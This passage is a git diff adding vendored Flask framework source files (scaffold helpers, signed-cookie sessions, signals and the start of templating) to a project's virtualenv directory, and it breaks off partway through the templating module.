+ #: :attr:`root_path`, to add to the template loader. ``None`` if + #: templates should not be added. + self.template_folder = template_folder + + if root_path is None: + root_path = get_root_path(self.import_name) + + #: Absolute path to the package on the filesystem. Used to look + #: up resources contained in the package. + self.root_path = root_path + + #: The Click command group for registering CLI commands for this + #: object. The commands are available from the ``flask`` command + #: once the application has been discovered and blueprints have + #: been registered. + self.cli = AppGroup() + + #: A dictionary mapping endpoint names to view functions. + #: + #: To register a view function, use the :meth:`route` decorator. + #: + #: This data structure is internal. It should not be modified + #: directly and its format may change at any time. 
+ self.view_functions: dict[str, t.Callable] = {} + + #: A data structure of registered error handlers, in the format + #: ``{scope: {code: {class: handler}}}``. The ``scope`` key is + #: the name of a blueprint the handlers are active for, or + #: ``None`` for all requests. The ``code`` key is the HTTP + #: status code for ``HTTPException``, or ``None`` for + #: other exceptions. The innermost dictionary maps exception + #: classes to handler functions. + #: + #: To register an error handler, use the :meth:`errorhandler` + #: decorator. + #: + #: This data structure is internal. It should not be modified + #: directly and its format may change at any time. + self.error_handler_spec: dict[ + ft.AppOrBlueprintKey, + dict[int | None, dict[type[Exception], ft.ErrorHandlerCallable]], + ] = defaultdict(lambda: defaultdict(dict)) + + #: A data structure of functions to call at the beginning of + #: each request, in the format ``{scope: [functions]}``. The + #: ``scope`` key is the name of a blueprint the functions are + #: active for, or ``None`` for all requests. + #: + #: To register a function, use the :meth:`before_request` + #: decorator. + #: + #: This data structure is internal. It should not be modified + #: directly and its format may change at any time. + self.before_request_funcs: dict[ + ft.AppOrBlueprintKey, list[ft.BeforeRequestCallable] + ] = defaultdict(list) + + #: A data structure of functions to call at the end of each + #: request, in the format ``{scope: [functions]}``. The + #: ``scope`` key is the name of a blueprint the functions are + #: active for, or ``None`` for all requests. + #: + #: To register a function, use the :meth:`after_request` + #: decorator. + #: + #: This data structure is internal. It should not be modified + #: directly and its format may change at any time. + self.after_request_funcs: dict[ + ft.AppOrBlueprintKey, list[ft.AfterRequestCallable] + ] = defaultdict(list) + + #: A data structure of functions to call at the end of each + #: request even if an exception is raised, in the format + #: ``{scope: [functions]}``. The ``scope`` key is the name of a + #: blueprint the functions are active for, or ``None`` for all + #: requests. + #: + #: To register a function, use the :meth:`teardown_request` + #: decorator. + #: + #: This data structure is internal. It should not be modified + #: directly and its format may change at any time. + self.teardown_request_funcs: dict[ + ft.AppOrBlueprintKey, list[ft.TeardownCallable] + ] = defaultdict(list) + + #: A data structure of functions to call to pass extra context + #: values when rendering templates, in the format + #: ``{scope: [functions]}``. The ``scope`` key is the name of a + #: blueprint the functions are active for, or ``None`` for all + #: requests. + #: + #: To register a function, use the :meth:`context_processor` + #: decorator. + #: + #: This data structure is internal. It should not be modified + #: directly and its format may change at any time. + self.template_context_processors: dict[ + ft.AppOrBlueprintKey, list[ft.TemplateContextProcessorCallable] + ] = defaultdict(list, {None: [_default_template_ctx_processor]}) + + #: A data structure of functions to call to modify the keyword + #: arguments passed to the view function, in the format + #: ``{scope: [functions]}``. The ``scope`` key is the name of a + #: blueprint the functions are active for, or ``None`` for all + #: requests. + #: + #: To register a function, use the + #: :meth:`url_value_preprocessor` decorator. 
+ #: + #: This data structure is internal. It should not be modified + #: directly and its format may change at any time. + self.url_value_preprocessors: dict[ + ft.AppOrBlueprintKey, + list[ft.URLValuePreprocessorCallable], + ] = defaultdict(list) + + #: A data structure of functions to call to modify the keyword + #: arguments when generating URLs, in the format + #: ``{scope: [functions]}``. The ``scope`` key is the name of a + #: blueprint the functions are active for, or ``None`` for all + #: requests. + #: + #: To register a function, use the :meth:`url_defaults` + #: decorator. + #: + #: This data structure is internal. It should not be modified + #: directly and its format may change at any time. + self.url_default_functions: dict[ + ft.AppOrBlueprintKey, list[ft.URLDefaultCallable] + ] = defaultdict(list) + + def __repr__(self) -> str: + return f"<{type(self).__name__} {self.name!r}>" + + def _check_setup_finished(self, f_name: str) -> None: + raise NotImplementedError + + @property + def static_folder(self) -> str | None: + """The absolute path to the configured static folder. ``None`` + if no static folder is set. + """ + if self._static_folder is not None: + return os.path.join(self.root_path, self._static_folder) + else: + return None + + @static_folder.setter + def static_folder(self, value: str | os.PathLike | None) -> None: + if value is not None: + value = os.fspath(value).rstrip(r"\/") + + self._static_folder = value + + @property + def has_static_folder(self) -> bool: + """``True`` if :attr:`static_folder` is set. + + .. versionadded:: 0.5 + """ + return self.static_folder is not None + + @property + def static_url_path(self) -> str | None: + """The URL prefix that the static route will be accessible from. + + If it was not configured during init, it is derived from + :attr:`static_folder`. + """ + if self._static_url_path is not None: + return self._static_url_path + + if self.static_folder is not None: + basename = os.path.basename(self.static_folder) + return f"/{basename}".rstrip("/") + + return None + + @static_url_path.setter + def static_url_path(self, value: str | None) -> None: + if value is not None: + value = value.rstrip("/") + + self._static_url_path = value + + @cached_property + def jinja_loader(self) -> FileSystemLoader | None: + """The Jinja loader for this object's templates. By default this + is a class :class:`jinja2.loaders.FileSystemLoader` to + :attr:`template_folder` if it is set. + + .. versionadded:: 0.5 + """ + if self.template_folder is not None: + return FileSystemLoader(os.path.join(self.root_path, self.template_folder)) + else: + return None + + def _method_route( + self, + method: str, + rule: str, + options: dict, + ) -> t.Callable[[T_route], T_route]: + if "methods" in options: + raise TypeError("Use the 'route' decorator to use the 'methods' argument.") + + return self.route(rule, methods=[method], **options) + + @setupmethod + def get(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]: + """Shortcut for :meth:`route` with ``methods=["GET"]``. + + .. versionadded:: 2.0 + """ + return self._method_route("GET", rule, options) + + @setupmethod + def post(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]: + """Shortcut for :meth:`route` with ``methods=["POST"]``. + + .. versionadded:: 2.0 + """ + return self._method_route("POST", rule, options) + + @setupmethod + def put(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]: + """Shortcut for :meth:`route` with ``methods=["PUT"]``. + + .. 
versionadded:: 2.0 + """ + return self._method_route("PUT", rule, options) + + @setupmethod + def delete(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]: + """Shortcut for :meth:`route` with ``methods=["DELETE"]``. + + .. versionadded:: 2.0 + """ + return self._method_route("DELETE", rule, options) + + @setupmethod + def patch(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]: + """Shortcut for :meth:`route` with ``methods=["PATCH"]``. + + .. versionadded:: 2.0 + """ + return self._method_route("PATCH", rule, options) + + @setupmethod + def route(self, rule: str, **options: t.Any) -> t.Callable[[T_route], T_route]: + """Decorate a view function to register it with the given URL + rule and options. Calls :meth:`add_url_rule`, which has more + details about the implementation. + + .. code-block:: python + + @app.route("/") + def index(): + return "Hello, World!" + + See :ref:`url-route-registrations`. + + The endpoint name for the route defaults to the name of the view + function if the ``endpoint`` parameter isn't passed. + + The ``methods`` parameter defaults to ``["GET"]``. ``HEAD`` and + ``OPTIONS`` are added automatically. + + :param rule: The URL rule string. + :param options: Extra options passed to the + :class:`~werkzeug.routing.Rule` object. + """ + + def decorator(f: T_route) -> T_route: + endpoint = options.pop("endpoint", None) + self.add_url_rule(rule, endpoint, f, **options) + return f + + return decorator + + @setupmethod + def add_url_rule( + self, + rule: str, + endpoint: str | None = None, + view_func: ft.RouteCallable | None = None, + provide_automatic_options: bool | None = None, + **options: t.Any, + ) -> None: + """Register a rule for routing incoming requests and building + URLs. The :meth:`route` decorator is a shortcut to call this + with the ``view_func`` argument. These are equivalent: + + .. code-block:: python + + @app.route("/") + def index(): + ... + + .. code-block:: python + + def index(): + ... + + app.add_url_rule("/", view_func=index) + + See :ref:`url-route-registrations`. + + The endpoint name for the route defaults to the name of the view + function if the ``endpoint`` parameter isn't passed. An error + will be raised if a function has already been registered for the + endpoint. + + The ``methods`` parameter defaults to ``["GET"]``. ``HEAD`` is + always added automatically, and ``OPTIONS`` is added + automatically by default. + + ``view_func`` does not necessarily need to be passed, but if the + rule should participate in routing an endpoint name must be + associated with a view function at some point with the + :meth:`endpoint` decorator. + + .. code-block:: python + + app.add_url_rule("/", endpoint="index") + + @app.endpoint("index") + def index(): + ... + + If ``view_func`` has a ``required_methods`` attribute, those + methods are added to the passed and automatic methods. If it + has a ``provide_automatic_methods`` attribute, it is used as the + default if the parameter is not passed. + + :param rule: The URL rule string. + :param endpoint: The endpoint name to associate with the rule + and view function. Used when routing and building URLs. + Defaults to ``view_func.__name__``. + :param view_func: The view function to associate with the + endpoint name. + :param provide_automatic_options: Add the ``OPTIONS`` method and + respond to ``OPTIONS`` requests automatically. + :param options: Extra options passed to the + :class:`~werkzeug.routing.Rule` object. 
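A small usage sketch of the ``get``/``post`` shortcuts and the ``route``/``add_url_rule`` equivalence described above (the routes and payloads are illustrative):

    from flask import Flask, request

    app = Flask(__name__)

    @app.get("/items")            # same as @app.route("/items", methods=["GET"])
    def list_items():
        return {"items": []}

    @app.post("/items")
    def create_item():
        payload = request.get_json(silent=True) or {}
        return payload, 201

    def ping():
        return "pong"

    # Decorator-free registration, equivalent to @app.route("/ping").
    app.add_url_rule("/ping", view_func=ping)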
+ """ + raise NotImplementedError + + @setupmethod + def endpoint(self, endpoint: str) -> t.Callable[[F], F]: + """Decorate a view function to register it for the given + endpoint. Used if a rule is added without a ``view_func`` with + :meth:`add_url_rule`. + + .. code-block:: python + + app.add_url_rule("/ex", endpoint="example") + + @app.endpoint("example") + def example(): + ... + + :param endpoint: The endpoint name to associate with the view + function. + """ + + def decorator(f: F) -> F: + self.view_functions[endpoint] = f + return f + + return decorator + + @setupmethod + def before_request(self, f: T_before_request) -> T_before_request: + """Register a function to run before each request. + + For example, this can be used to open a database connection, or + to load the logged in user from the session. + + .. code-block:: python + + @app.before_request + def load_user(): + if "user_id" in session: + g.user = db.session.get(session["user_id"]) + + The function will be called without any arguments. If it returns + a non-``None`` value, the value is handled as if it was the + return value from the view, and further request handling is + stopped. + + This is available on both app and blueprint objects. When used on an app, this + executes before every request. When used on a blueprint, this executes before + every request that the blueprint handles. To register with a blueprint and + execute before every request, use :meth:`.Blueprint.before_app_request`. + """ + self.before_request_funcs.setdefault(None, []).append(f) + return f + + @setupmethod + def after_request(self, f: T_after_request) -> T_after_request: + """Register a function to run after each request to this object. + + The function is called with the response object, and must return + a response object. This allows the functions to modify or + replace the response before it is sent. + + If a function raises an exception, any remaining + ``after_request`` functions will not be called. Therefore, this + should not be used for actions that must execute, such as to + close resources. Use :meth:`teardown_request` for that. + + This is available on both app and blueprint objects. When used on an app, this + executes after every request. When used on a blueprint, this executes after + every request that the blueprint handles. To register with a blueprint and + execute after every request, use :meth:`.Blueprint.after_app_request`. + """ + self.after_request_funcs.setdefault(None, []).append(f) + return f + + @setupmethod + def teardown_request(self, f: T_teardown) -> T_teardown: + """Register a function to be called when the request context is + popped. Typically this happens at the end of each request, but + contexts may be pushed manually as well during testing. + + .. code-block:: python + + with app.test_request_context(): + ... + + When the ``with`` block exits (or ``ctx.pop()`` is called), the + teardown functions are called just before the request context is + made inactive. + + When a teardown function was called because of an unhandled + exception it will be passed an error object. If an + :meth:`errorhandler` is registered, it will handle the exception + and the teardown will not receive it. + + Teardown functions must avoid raising exceptions. If they + execute code that might fail they must surround that code with a + ``try``/``except`` block and log any errors. + + The return values of teardown functions are ignored. + + This is available on both app and blueprint objects. 
When used on an app, this + executes after every request. When used on a blueprint, this executes after + every request that the blueprint handles. To register with a blueprint and + execute after every request, use :meth:`.Blueprint.teardown_app_request`. + """ + self.teardown_request_funcs.setdefault(None, []).append(f) + return f + + @setupmethod + def context_processor( + self, + f: T_template_context_processor, + ) -> T_template_context_processor: + """Registers a template context processor function. These functions run before + rendering a template. The keys of the returned dict are added as variables + available in the template. + + This is available on both app and blueprint objects. When used on an app, this + is called for every rendered template. When used on a blueprint, this is called + for templates rendered from the blueprint's views. To register with a blueprint + and affect every template, use :meth:`.Blueprint.app_context_processor`. + """ + self.template_context_processors[None].append(f) + return f + + @setupmethod + def url_value_preprocessor( + self, + f: T_url_value_preprocessor, + ) -> T_url_value_preprocessor: + """Register a URL value preprocessor function for all view + functions in the application. These functions will be called before the + :meth:`before_request` functions. + + The function can modify the values captured from the matched url before + they are passed to the view. For example, this can be used to pop a + common language code value and place it in ``g`` rather than pass it to + every view. + + The function is passed the endpoint name and values dict. The return + value is ignored. + + This is available on both app and blueprint objects. When used on an app, this + is called for every request. When used on a blueprint, this is called for + requests that the blueprint handles. To register with a blueprint and affect + every request, use :meth:`.Blueprint.app_url_value_preprocessor`. + """ + self.url_value_preprocessors[None].append(f) + return f + + @setupmethod + def url_defaults(self, f: T_url_defaults) -> T_url_defaults: + """Callback function for URL defaults for all view functions of the + application. It's called with the endpoint and values and should + update the values passed in place. + + This is available on both app and blueprint objects. When used on an app, this + is called for every request. When used on a blueprint, this is called for + requests that the blueprint handles. To register with a blueprint and affect + every request, use :meth:`.Blueprint.app_url_defaults`. + """ + self.url_default_functions[None].append(f) + return f + + @setupmethod + def errorhandler( + self, code_or_exception: type[Exception] | int + ) -> t.Callable[[T_error_handler], T_error_handler]: + """Register a function to handle errors by code or exception class. + + A decorator that is used to register a function given an + error code. Example:: + + @app.errorhandler(404) + def page_not_found(error): + return 'This page does not exist', 404 + + You can also register handlers for arbitrary exceptions:: + + @app.errorhandler(DatabaseError) + def special_exception_handler(error): + return 'Database connection failed', 500 + + This is available on both app and blueprint objects. When used on an app, this + can handle errors from every request. When used on a blueprint, this can handle + errors from requests that the blueprint handles. To register with a blueprint + and affect every request, use :meth:`.Blueprint.app_errorhandler`. + + .. 
versionadded:: 0.7 + Use :meth:`register_error_handler` instead of modifying + :attr:`error_handler_spec` directly, for application wide error + handlers. + + .. versionadded:: 0.7 + One can now additionally also register custom exception types + that do not necessarily have to be a subclass of the + :class:`~werkzeug.exceptions.HTTPException` class. + + :param code_or_exception: the code as integer for the handler, or + an arbitrary exception + """ + + def decorator(f: T_error_handler) -> T_error_handler: + self.register_error_handler(code_or_exception, f) + return f + + return decorator + + @setupmethod + def register_error_handler( + self, + code_or_exception: type[Exception] | int, + f: ft.ErrorHandlerCallable, + ) -> None: + """Alternative error attach function to the :meth:`errorhandler` + decorator that is more straightforward to use for non decorator + usage. + + .. versionadded:: 0.7 + """ + exc_class, code = self._get_exc_class_and_code(code_or_exception) + self.error_handler_spec[None][code][exc_class] = f + + @staticmethod + def _get_exc_class_and_code( + exc_class_or_code: type[Exception] | int, + ) -> tuple[type[Exception], int | None]: + """Get the exception class being handled. For HTTP status codes + or ``HTTPException`` subclasses, return both the exception and + status code. + + :param exc_class_or_code: Any exception class, or an HTTP status + code as an integer. + """ + exc_class: type[Exception] + + if isinstance(exc_class_or_code, int): + try: + exc_class = default_exceptions[exc_class_or_code] + except KeyError: + raise ValueError( + f"'{exc_class_or_code}' is not a recognized HTTP" + " error code. Use a subclass of HTTPException with" + " that code instead." + ) from None + else: + exc_class = exc_class_or_code + + if isinstance(exc_class, Exception): + raise TypeError( + f"{exc_class!r} is an instance, not a class. Handlers" + " can only be registered for Exception classes or HTTP" + " error codes." + ) + + if not issubclass(exc_class, Exception): + raise ValueError( + f"'{exc_class.__name__}' is not a subclass of Exception." + " Handlers can only be registered for Exception classes" + " or HTTP error codes." + ) + + if issubclass(exc_class, HTTPException): + return exc_class, exc_class.code + else: + return exc_class, None + + +def _endpoint_from_view_func(view_func: t.Callable) -> str: + """Internal helper that returns the default endpoint for a given + function. This always is the function name. + """ + assert view_func is not None, "expected view func if endpoint is not provided." 
+ return view_func.__name__ + + +def _path_is_relative_to(path: pathlib.PurePath, base: str) -> bool: + # Path.is_relative_to doesn't exist until Python 3.9 + try: + path.relative_to(base) + return True + except ValueError: + return False + + +def _find_package_path(import_name): + """Find the path that contains the package or module.""" + root_mod_name, _, _ = import_name.partition(".") + + try: + root_spec = importlib.util.find_spec(root_mod_name) + + if root_spec is None: + raise ValueError("not found") + except (ImportError, ValueError): + # ImportError: the machinery told us it does not exist + # ValueError: + # - the module name was invalid + # - the module name is __main__ + # - we raised `ValueError` due to `root_spec` being `None` + return os.getcwd() + + if root_spec.origin in {"namespace", None}: + # namespace package + package_spec = importlib.util.find_spec(import_name) + + if package_spec is not None and package_spec.submodule_search_locations: + # Pick the path in the namespace that contains the submodule. + package_path = pathlib.Path( + os.path.commonpath(package_spec.submodule_search_locations) + ) + search_location = next( + location + for location in root_spec.submodule_search_locations + if _path_is_relative_to(package_path, location) + ) + else: + # Pick the first path. + search_location = root_spec.submodule_search_locations[0] + + return os.path.dirname(search_location) + elif root_spec.submodule_search_locations: + # package with __init__.py + return os.path.dirname(os.path.dirname(root_spec.origin)) + else: + # module + return os.path.dirname(root_spec.origin) + + +def find_package(import_name: str): + """Find the prefix that a package is installed under, and the path + that it would be imported from. + + The prefix is the directory containing the standard directory + hierarchy (lib, bin, etc.). If the package is not installed to the + system (:attr:`sys.prefix`) or a virtualenv (``site-packages``), + ``None`` is returned. + + The path is the entry in :attr:`sys.path` that contains the package + for import. If the package is not installed, it's assumed that the + package was imported from the current working directory. 
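Returning to the ``errorhandler``/``register_error_handler`` methods a little earlier in this hunk, both accept an HTTP status code or an exception class; a minimal sketch of the two forms (the exception class and messages are illustrative):

    from flask import Flask

    app = Flask(__name__)

    @app.errorhandler(404)
    def page_not_found(error):
        return "This page does not exist", 404

    class PaymentRequired(Exception):
        pass

    def handle_payment_required(error):
        return "Payment required", 402

    # Non-decorator form, equivalent to @app.errorhandler(PaymentRequired).
    app.register_error_handler(PaymentRequired, handle_payment_required)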
+ """ + package_path = _find_package_path(import_name) + py_prefix = os.path.abspath(sys.prefix) + + # installed to the system + if _path_is_relative_to(pathlib.PurePath(package_path), py_prefix): + return py_prefix, package_path + + site_parent, site_folder = os.path.split(package_path) + + # installed to a virtualenv + if site_folder.lower() == "site-packages": + parent, folder = os.path.split(site_parent) + + # Windows (prefix/lib/site-packages) + if folder.lower() == "lib": + return parent, package_path + + # Unix (prefix/lib/pythonX.Y/site-packages) + if os.path.basename(parent).lower() == "lib": + return os.path.dirname(parent), package_path + + # something else (prefix/site-packages) + return site_parent, package_path + + # not installed + return None, package_path diff --git a/env/Lib/site-packages/flask/sessions.py b/env/Lib/site-packages/flask/sessions.py new file mode 100644 index 00000000..e5650d68 --- /dev/null +++ b/env/Lib/site-packages/flask/sessions.py @@ -0,0 +1,367 @@ +from __future__ import annotations + +import hashlib +import typing as t +from collections.abc import MutableMapping +from datetime import datetime +from datetime import timezone + +from itsdangerous import BadSignature +from itsdangerous import URLSafeTimedSerializer +from werkzeug.datastructures import CallbackDict + +from .json.tag import TaggedJSONSerializer + +if t.TYPE_CHECKING: # pragma: no cover + from .app import Flask + from .wrappers import Request, Response + + +class SessionMixin(MutableMapping): + """Expands a basic dictionary with session attributes.""" + + @property + def permanent(self) -> bool: + """This reflects the ``'_permanent'`` key in the dict.""" + return self.get("_permanent", False) + + @permanent.setter + def permanent(self, value: bool) -> None: + self["_permanent"] = bool(value) + + #: Some implementations can detect whether a session is newly + #: created, but that is not guaranteed. Use with caution. The mixin + # default is hard-coded ``False``. + new = False + + #: Some implementations can detect changes to the session and set + #: this when that happens. The mixin default is hard coded to + #: ``True``. + modified = True + + #: Some implementations can detect when session data is read or + #: written and set this when that happens. The mixin default is hard + #: coded to ``True``. + accessed = True + + +class SecureCookieSession(CallbackDict, SessionMixin): + """Base class for sessions based on signed cookies. + + This session backend will set the :attr:`modified` and + :attr:`accessed` attributes. It cannot reliably track whether a + session is new (vs. empty), so :attr:`new` remains hard coded to + ``False``. + """ + + #: When data is changed, this is set to ``True``. Only the session + #: dictionary itself is tracked; if the session contains mutable + #: data (for example a nested dict) then this must be set to + #: ``True`` manually when modifying that data. The session cookie + #: will only be written to the response if this is ``True``. + modified = False + + #: When data is read or written, this is set to ``True``. Used by + # :class:`.SecureCookieSessionInterface` to add a ``Vary: Cookie`` + #: header, which allows caching proxies to cache different pages for + #: different users. 
+ accessed = False + + def __init__(self, initial: t.Any = None) -> None: + def on_update(self) -> None: + self.modified = True + self.accessed = True + + super().__init__(initial, on_update) + + def __getitem__(self, key: str) -> t.Any: + self.accessed = True + return super().__getitem__(key) + + def get(self, key: str, default: t.Any = None) -> t.Any: + self.accessed = True + return super().get(key, default) + + def setdefault(self, key: str, default: t.Any = None) -> t.Any: + self.accessed = True + return super().setdefault(key, default) + + +class NullSession(SecureCookieSession): + """Class used to generate nicer error messages if sessions are not + available. Will still allow read-only access to the empty session + but fail on setting. + """ + + def _fail(self, *args: t.Any, **kwargs: t.Any) -> t.NoReturn: + raise RuntimeError( + "The session is unavailable because no secret " + "key was set. Set the secret_key on the " + "application to something unique and secret." + ) + + __setitem__ = __delitem__ = clear = pop = popitem = update = setdefault = _fail # type: ignore # noqa: B950 + del _fail + + +class SessionInterface: + """The basic interface you have to implement in order to replace the + default session interface which uses werkzeug's securecookie + implementation. The only methods you have to implement are + :meth:`open_session` and :meth:`save_session`, the others have + useful defaults which you don't need to change. + + The session object returned by the :meth:`open_session` method has to + provide a dictionary like interface plus the properties and methods + from the :class:`SessionMixin`. We recommend just subclassing a dict + and adding that mixin:: + + class Session(dict, SessionMixin): + pass + + If :meth:`open_session` returns ``None`` Flask will call into + :meth:`make_null_session` to create a session that acts as replacement + if the session support cannot work because some requirement is not + fulfilled. The default :class:`NullSession` class that is created + will complain that the secret key was not set. + + To replace the session interface on an application all you have to do + is to assign :attr:`flask.Flask.session_interface`:: + + app = Flask(__name__) + app.session_interface = MySessionInterface() + + Multiple requests with the same session may be sent and handled + concurrently. When implementing a new session interface, consider + whether reads or writes to the backing store must be synchronized. + There is no guarantee on the order in which the session for each + request is opened or saved, it will occur in the order that requests + begin and end processing. + + .. versionadded:: 0.8 + """ + + #: :meth:`make_null_session` will look here for the class that should + #: be created when a null session is requested. Likewise the + #: :meth:`is_null_session` method will perform a typecheck against + #: this type. + null_session_class = NullSession + + #: A flag that indicates if the session interface is pickle based. + #: This can be used by Flask extensions to make a decision in regards + #: to how to deal with the session object. + #: + #: .. versionadded:: 0.10 + pickle_based = False + + def make_null_session(self, app: Flask) -> NullSession: + """Creates a null session which acts as a replacement object if the + real session support could not be loaded due to a configuration + error. 
This mainly aids the user experience because the job of the + null session is to still support lookup without complaining but + modifications are answered with a helpful error message of what + failed. + + This creates an instance of :attr:`null_session_class` by default. + """ + return self.null_session_class() + + def is_null_session(self, obj: object) -> bool: + """Checks if a given object is a null session. Null sessions are + not asked to be saved. + + This checks if the object is an instance of :attr:`null_session_class` + by default. + """ + return isinstance(obj, self.null_session_class) + + def get_cookie_name(self, app: Flask) -> str: + """The name of the session cookie. Uses``app.config["SESSION_COOKIE_NAME"]``.""" + return app.config["SESSION_COOKIE_NAME"] + + def get_cookie_domain(self, app: Flask) -> str | None: + """The value of the ``Domain`` parameter on the session cookie. If not set, + browsers will only send the cookie to the exact domain it was set from. + Otherwise, they will send it to any subdomain of the given value as well. + + Uses the :data:`SESSION_COOKIE_DOMAIN` config. + + .. versionchanged:: 2.3 + Not set by default, does not fall back to ``SERVER_NAME``. + """ + rv = app.config["SESSION_COOKIE_DOMAIN"] + return rv if rv else None + + def get_cookie_path(self, app: Flask) -> str: + """Returns the path for which the cookie should be valid. The + default implementation uses the value from the ``SESSION_COOKIE_PATH`` + config var if it's set, and falls back to ``APPLICATION_ROOT`` or + uses ``/`` if it's ``None``. + """ + return app.config["SESSION_COOKIE_PATH"] or app.config["APPLICATION_ROOT"] + + def get_cookie_httponly(self, app: Flask) -> bool: + """Returns True if the session cookie should be httponly. This + currently just returns the value of the ``SESSION_COOKIE_HTTPONLY`` + config var. + """ + return app.config["SESSION_COOKIE_HTTPONLY"] + + def get_cookie_secure(self, app: Flask) -> bool: + """Returns True if the cookie should be secure. This currently + just returns the value of the ``SESSION_COOKIE_SECURE`` setting. + """ + return app.config["SESSION_COOKIE_SECURE"] + + def get_cookie_samesite(self, app: Flask) -> str: + """Return ``'Strict'`` or ``'Lax'`` if the cookie should use the + ``SameSite`` attribute. This currently just returns the value of + the :data:`SESSION_COOKIE_SAMESITE` setting. + """ + return app.config["SESSION_COOKIE_SAMESITE"] + + def get_expiration_time(self, app: Flask, session: SessionMixin) -> datetime | None: + """A helper method that returns an expiration date for the session + or ``None`` if the session is linked to the browser session. The + default implementation returns now + the permanent session + lifetime configured on the application. + """ + if session.permanent: + return datetime.now(timezone.utc) + app.permanent_session_lifetime + return None + + def should_set_cookie(self, app: Flask, session: SessionMixin) -> bool: + """Used by session backends to determine if a ``Set-Cookie`` header + should be set for this session cookie for this response. If the session + has been modified, the cookie is set. If the session is permanent and + the ``SESSION_REFRESH_EACH_REQUEST`` config is true, the cookie is + always set. + + This check is usually skipped if the session was deleted. + + .. 
versionadded:: 0.11 + """ + + return session.modified or ( + session.permanent and app.config["SESSION_REFRESH_EACH_REQUEST"] + ) + + def open_session(self, app: Flask, request: Request) -> SessionMixin | None: + """This is called at the beginning of each request, after + pushing the request context, before matching the URL. + + This must return an object which implements a dictionary-like + interface as well as the :class:`SessionMixin` interface. + + This will return ``None`` to indicate that loading failed in + some way that is not immediately an error. The request + context will fall back to using :meth:`make_null_session` + in this case. + """ + raise NotImplementedError() + + def save_session( + self, app: Flask, session: SessionMixin, response: Response + ) -> None: + """This is called at the end of each request, after generating + a response, before removing the request context. It is skipped + if :meth:`is_null_session` returns ``True``. + """ + raise NotImplementedError() + + +session_json_serializer = TaggedJSONSerializer() + + +class SecureCookieSessionInterface(SessionInterface): + """The default session interface that stores sessions in signed cookies + through the :mod:`itsdangerous` module. + """ + + #: the salt that should be applied on top of the secret key for the + #: signing of cookie based sessions. + salt = "cookie-session" + #: the hash function to use for the signature. The default is sha1 + digest_method = staticmethod(hashlib.sha1) + #: the name of the itsdangerous supported key derivation. The default + #: is hmac. + key_derivation = "hmac" + #: A python serializer for the payload. The default is a compact + #: JSON derived serializer with support for some extra Python types + #: such as datetime objects or tuples. + serializer = session_json_serializer + session_class = SecureCookieSession + + def get_signing_serializer(self, app: Flask) -> URLSafeTimedSerializer | None: + if not app.secret_key: + return None + signer_kwargs = dict( + key_derivation=self.key_derivation, digest_method=self.digest_method + ) + return URLSafeTimedSerializer( + app.secret_key, + salt=self.salt, + serializer=self.serializer, + signer_kwargs=signer_kwargs, + ) + + def open_session(self, app: Flask, request: Request) -> SecureCookieSession | None: + s = self.get_signing_serializer(app) + if s is None: + return None + val = request.cookies.get(self.get_cookie_name(app)) + if not val: + return self.session_class() + max_age = int(app.permanent_session_lifetime.total_seconds()) + try: + data = s.loads(val, max_age=max_age) + return self.session_class(data) + except BadSignature: + return self.session_class() + + def save_session( + self, app: Flask, session: SessionMixin, response: Response + ) -> None: + name = self.get_cookie_name(app) + domain = self.get_cookie_domain(app) + path = self.get_cookie_path(app) + secure = self.get_cookie_secure(app) + samesite = self.get_cookie_samesite(app) + httponly = self.get_cookie_httponly(app) + + # Add a "Vary: Cookie" header if the session was accessed at all. + if session.accessed: + response.vary.add("Cookie") + + # If the session is modified to be empty, remove the cookie. + # If the session is empty, return without setting the cookie. 
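As an aside before the cookie-writing branch continues, a sketch of how the ``SecureCookieSession`` attributes documented in this file behave from application code (the route and session keys are illustrative):

    from flask import Flask, session

    app = Flask(__name__)
    app.secret_key = "change-me"    # required for the signing serializer

    @app.route("/visit")
    def visit():
        session.permanent = True    # stores the '_permanent' key
        counts = session.setdefault("counts", {})
        counts["visits"] = counts.get("visits", 0) + 1
        # Mutating a nested dict is not seen by CallbackDict, so flag the
        # session as modified or the cookie will not be re-written.
        session.modified = True
        return str(counts["visits"])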
+ if not session: + if session.modified: + response.delete_cookie( + name, + domain=domain, + path=path, + secure=secure, + samesite=samesite, + httponly=httponly, + ) + response.vary.add("Cookie") + + return + + if not self.should_set_cookie(app, session): + return + + expires = self.get_expiration_time(app, session) + val = self.get_signing_serializer(app).dumps(dict(session)) # type: ignore + response.set_cookie( + name, + val, # type: ignore + expires=expires, + httponly=httponly, + domain=domain, + path=path, + secure=secure, + samesite=samesite, + ) + response.vary.add("Cookie") diff --git a/env/Lib/site-packages/flask/signals.py b/env/Lib/site-packages/flask/signals.py new file mode 100644 index 00000000..444fda99 --- /dev/null +++ b/env/Lib/site-packages/flask/signals.py @@ -0,0 +1,17 @@ +from __future__ import annotations + +from blinker import Namespace + +# This namespace is only for signals provided by Flask itself. +_signals = Namespace() + +template_rendered = _signals.signal("template-rendered") +before_render_template = _signals.signal("before-render-template") +request_started = _signals.signal("request-started") +request_finished = _signals.signal("request-finished") +request_tearing_down = _signals.signal("request-tearing-down") +got_request_exception = _signals.signal("got-request-exception") +appcontext_tearing_down = _signals.signal("appcontext-tearing-down") +appcontext_pushed = _signals.signal("appcontext-pushed") +appcontext_popped = _signals.signal("appcontext-popped") +message_flashed = _signals.signal("message-flashed") diff --git a/env/Lib/site-packages/flask/templating.py b/env/Lib/site-packages/flask/templating.py new file mode 100644 index 00000000..8dff8bac --- /dev/null +++ b/env/Lib/site-packages/flask/templating.py @@ -0,0 +1,221 @@ +from __future__ import annotations + +import typing as t + +from jinja2 import BaseLoader +from jinja2 import Environment as BaseEnvironment +from jinja2 import Template +from jinja2 import TemplateNotFound + +from .globals import _cv_app +from .globals import _cv_request +from .globals import current_app +from .globals import request +from .helpers import stream_with_context +from .signals import before_render_template +from .signals import template_rendered + +if t.TYPE_CHECKING: # pragma: no cover + from .app import Flask + from .sansio.app import App + from .sansio.scaffold import Scaffold + + +def _default_template_ctx_processor() -> dict[str, t.Any]: + """Default template context processor. Injects `request`, + `session` and `g`. + """ + appctx = _cv_app.get(None) + reqctx = _cv_request.get(None) + rv: dict[str, t.Any] = {} + if appctx is not None: + rv["g"] = appctx.g + if reqctx is not None: + rv["request"] = reqctx.request + rv["session"] = reqctx.session + return rv + + +class Environment(BaseEnvironment): + """Works like a regular Jinja2 environment but has some additional + knowledge of 